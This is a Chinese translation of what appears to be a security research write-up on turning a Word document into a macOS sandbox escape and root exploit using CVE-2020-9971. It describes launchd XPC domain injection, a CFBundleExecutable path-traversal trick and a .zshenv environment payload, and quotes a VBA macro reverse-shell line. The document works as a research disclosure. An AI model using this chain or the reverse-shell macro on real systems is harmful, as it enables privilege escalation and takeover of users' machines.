在本文中,研究人員展示了他們如何利用已發布的 macOS/iOS 權限提升漏洞將 Word 文檔武器化,解除應用程序沙箱限制并獲得更高權限。
CVE-2020-9971 是 macOS/iOS 中的一個邏輯漏洞,可用于穩定的提權漏洞。在這篇文章中,研究人員 (@R3dF09) 提到它也可以在最受限制的應用沙箱中運行,因此研究人員決定對其進行測試并使用武器化的 Word 文檔繞過 Microsoft Office 2019(適用于 Mac)應用沙箱。為了完成這個任務,研究人員不得不使用一些有趣的技巧來繞過 Apple 的文件隔離。
CVE-2020-9971位于launchd進程中,與XPC Services機制有關。這種機制提供了進程間通信,允許開發人員創建為其應用程序執行特定任務的服務。這通常用于將應用程序拆分為更小的部分,從而提高可靠性和安全性。launchd是mac系統下通用的進程管理器,是mac系統下非常重要的一個進程,一般來說該進程不允許直接以命令行的形式調用。只能通過其控制管理界面,launchctl來進行控制。launchd主要功能是進程管理。可以理解成是一個常駐在后臺的進程,根據用戶的配置,來響應特定的系統事件。launchd既可以用于系統級別的服務,又可以用于個人用戶級別的服務。
每個進程都有自己的域,由 launchd 管理,其中包含有關進程可用的 XPC 服務的信息。蘋果聲稱只有擁有者進程才能修改自己的域,但該漏洞的核心漏洞是能夠將任意 XPC 服務添加到任意進程域中,然后觸發它在該進程的上下文中運行。起初,攻擊者將自制的 XPC 服務“注入”到具有 root 權限的特定進程的域中(systemsoundserverd)。開發者還使用了 XPC 服務的一個眾所周知的功能來監聽套接字以觸發和啟動它。
接下來,研究人員將描述成功將 Word 文檔武器化并繞過 Word 應用程序沙箱的步驟。該研究是在易受 CVE-2020-9971 攻擊的 macOS 10.15.4 和當時最新版本的 Microsoft Office 2019 上進行的,但這無關緊要,因為該漏洞在操作系統端。
漏洞利用
研究人員的第一個目標是創建一個獨立的命令行漏洞利用。在這個階段,研究人員認為他們只需要刪除它并從武器化的 Word 文檔中執行它即可,但實際情況并非如此。無論如何,研究人員用 XCode 創建了一個應用程序,附帶一個簡單的 XPC 服務,它執行以下步驟:
1.查找研究人員要使用的 root 特權進程的 PID。正如研究人員已經知道不可能在 Office 應用沙箱中執行 ps 一樣,研究人員改為使用 launchctl 打印系統的輸出,它顯示了系統中的進程域。此時研究人員注意到systemoundserverd的進程域是在啟動后延遲相當長的時間創建的,所以研究人員改用launchservicesd的進程域;
2.將研究人員的 XPC 服務注入到找到的 PID 的進程域中;
3.通過打開 TCP 套接字觸發研究人員的 XPC 服務的啟動;
附帶的XPC服務只創建一個文件(表示成功),并配置為在指定的TCP端口上偵聽。漏洞利用和 XPC 服務都存儲在同一個應用程序包中,但請注意研究人員有兩個不同的可執行文件。
通過這個獨立的漏洞利用,研究人員能夠從普通用戶那里獲得 root 權限,現在是時候開始實現研究人員的最終目標了——繞過沙盒。
繞過沙盒
研究人員的最終目標是使用此漏洞將 Word 文檔武器化,以繞過應用程序沙箱。其基礎是能夠從這個Word文檔中執行shell命令,這可以通過Microsoft Office中的其他漏洞實現,或者更容易通過VBA宏實現,這讓研究人員只剩下說服用戶按下“啟用宏”的工作。更多關于針對 Mac 用戶的基于宏的攻擊請點此https://perception-point.io/mac-isnt-safe-how-do-you-like-them-apples/查看。對于這個概念驗證,研究人員將使用 VBA 宏。
在 Office 應用沙箱的上下文中獲取 bash shell 很簡單,然后利用這些限制。研究人員所要做的就是偵聽特定端口(例如 netcat)并從 Word 文檔中執行以下 VBA 宏:
MacScript(“do shell script ”“bash -I >&/dev/tcp/127.0.0.1/PORT 0>&1 &”“”)
此時,在沙箱中有了一個shell,研究人員試圖轉儲并執行獨立漏洞,但它沒有奏效。經過一些研究,研究人員發現他們在沙箱中創建的每個文件都是使用“com.apple.quarantine”屬性創建的,這個可以通過 xattr 實用程序觀察到。
隔離屬性是許多 macOS 保護的核心,最初,它僅附加到從互聯網下載的文件中,以執行多項安全檢查(例如文件隔離、GateKeeper、Notarization 和 XProtect)。自從引入了沙箱之后,這個屬性又增加了一個角色——標記從沙箱中創建的文件,并完全阻止它們被執行。以下是研究人員試圖從沙箱shell中轉儲和執行一個文件時產生的日志:
kernel: (Sandbox) Sandbox: bash(1724) deny(1) process-exec* /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test
kernel: (Quarantine) exec of /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test denied since it was quarantined by Microsoft Word and created without user consent, qtn-flags was 0x00000086
可以看到研究人員可以執行 shell 命令,但不能轉儲和運行他們自己的可執行文件。對于可利用的可執行文件,研究人員有一個簡單的替換方法:只需在ctypes包的幫助下運行一個執行相同步驟的python腳本。現在研究人員就能夠將 XPC 服務注入目標進程域,甚至觸發它的執行,但它沒有運行:XPC 服務可執行文件本身被標記為隔離屬性。
現在是時候更深入地研究XPC服務的結構了。從外部看,它看起來像一個擴展名為“xpc”的單一文件,但它實際上是一個具有典型結構的文件夾:
主要組件是 Info.plist 文件,它是一個描述服務的 XML 文件,以及可執行文件本身(位于 MacOS 文件夾內)。Info.plist 中的部分內容如下:
< key >CFBundleExecutable< /key >< string >AppService< /string >
研究人員不能使用他們自己的可執行文件,所以唯一的選擇是使用系統現有的可執行文件之一。研究人員嘗試在 CFBundleExecutable 項中使用完整路徑,但是 XPC 服務根本無法加載。很明顯,macOS 會在目錄 Contents/MacOS 中查找具有此項中指定名稱的可執行文件,也許研究人員可以使用路徑遍歷來指向現有的可執行文件,并嘗試將值更改為:
< key >CFBundleExecutable< /key >< string >/////////usr/bin/yes< /string >
令研究人員驚訝的是,它奏效了!當研究人員使用這個“假”XPC 服務執行漏洞利用時,研究人員發現了一個具有 root 權限的“是”進程,即使研究人員是從沙箱中執行的。
因此,研究人員有能力以 root 權限運行進程,但似乎無法控制它們的參數。在團隊內部就這個問題進一步咨詢后,研究人員想出了一個好辦法,他們注意到可以控制新進程的環境變量,即運行一個 shell 作為 XPC 服務(例如 zsh),將其 HOME 目錄更改為研究人員可以控制,并將 shell 在執行開始時提供的文件放在那里(例如。zshenv)。
將它們全部封裝在一起
研究人員編寫了一個 python 腳本,執行以下步驟:
1.將“。zshenv”文件寫入當前目錄,在沙箱內,路徑為 /Users/user/Library/Containers/com.microsoft.Word/Data,其中包含研究人員希望以 root 身份執行的載荷;
2.查找研究人員要使用的 root 權限進程的 PID (launchservicesd);
3.創建“假”XPC 服務,其中可執行文件指向 zsh,并將 HOME 環境變量設置為當前目錄;
4.將“假”XPC 服務注入到找到的 PID 的進程域中;
5.通過打開 TCP 套接字觸發 XPC 服務的啟動;
然后研究人員將該腳本封裝為 base64 格式,以便從VBA宏中執行它,并將其插入到 AutoOpen 子例程中。具體演示過程請點此,其中有效載荷只在/tmp/hacked中創建一個文件(請注意,該文件是以 root 身份創建的,并且沒有隔離位)。
總結
研究人員證明了 CVE-2020-9971 可以用作沙箱逃逸漏洞,以 Word 文檔作為研究人員的 POC。在這個過程中,研究人員發現了一種通過 XPC 服務啟動任意可執行文件的方法(在 CFBundleExecutable 值中進行路徑遍歷),特別是執行 shell 腳本(通過控制 HOME 環境變量和轉儲 .zshenv 文件的技巧)。
這個沙箱逃逸漏洞使研究人員能夠為 macOS 創建一個快速、簡單和廉價的武器化 Word 文檔,這嚴重危害了系統安全。
安全建議
1.避免打開陌生文檔,尤其是運行來自未知來源或你不完全信任的發送方;
2.使用能夠處理此類攻擊的綜合性安全產品。
